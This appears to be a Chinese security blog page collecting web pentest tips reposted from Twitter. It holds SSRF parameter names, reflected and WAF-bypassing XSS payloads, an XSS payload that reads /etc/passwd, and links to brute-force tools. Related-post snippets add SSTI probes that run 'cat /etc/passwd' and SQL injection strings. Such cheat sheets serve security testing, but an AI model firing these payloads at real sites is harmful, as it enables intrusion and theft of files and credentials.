Twitter渗透技巧搬运工

VSole2022-07-19 11:56:47
  • SSRF常用参数
?host=?redirect=?uri=?path=?continue=?url=?window=?next=?data=?image-source=?n=?to=?follow=?u=?go=?fetch=?source=?img-src=

XSS/XXE 等攻击的在线有效负载,以测试和检测带外交互

地址:https://github.com/projectdiscovery/interactsh

Tips Rxss

--><svg onload=alert(document.domain)>

shodan黑客语法

Pinkerton 是一款JavaScript 文件爬虫和密钥查找器

地址:https://github.com/oppsec/Pinkerton

tomcat爆破脚本工具

地址:https://github.com/oppsec/tomcter

XSS WafBypass

<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
练习地址:https://brutelogic.com.br/gym.php?p05=%3Csvg%3E%3Cset+onbegin=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb%3E
从XSS到本地文件读取<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
本作品采用《CC 协议》,转载必须注明作者和本文链接
Twitter渗透技巧搬运工
2022-08-21 11:21:33
Twitter渗透技巧搬运工
Twitter渗透技巧搬运工
{2*2}[[7*7]] {{7*7}} {{7*'7'}} <%= 7 * 7 %> {{ request }} {{self}} {{dump(app)}} #{3*3} #{ 3 * 3 } {{ ''.__class__.__mro__[2].__subclasses__() }} {{['cat%20/etc/passwd']|filter('system')}}
' OR 1=1-- ' OR 1=0-- %27%20or%201=1 *(|(object=*)) )%20or%20('x'='x %20or%201=1 1) or pg_sleep(__TIME__)-- /**/or/**/1/**/=1 ' or username like '% );waitfor delay '0:0:__TIME__'-- or isNULL(1/0) /* x
快速检测有无SQL注入' OR 1=1--. 获取凭证访问密钥?将标头更改为这样并观察响应
纪念凯文·米特尼克:黑客,安全专家,传奇人物经典著作:《欺骗的艺术》,黑客社工必看书籍一、引言凯文·米特尼克,一位曾经的黑客,后来的安全专家,于2023年7月16日因胰腺癌去世,享年59岁。
信息搜集:开源情报信息收集、创建企业密码字典进入内网:基于企业弱账号漏洞、基于系统漏洞进入、网站应用程序渗透隐匿攻击:Command and Control、代理内网跨边界应用:内网跨边界转发、内网跨边界代理穿透、shell反弹等
一个内网安全攻防的知识仓库
Github渗透测试文档资料集合
VSole
网络安全专家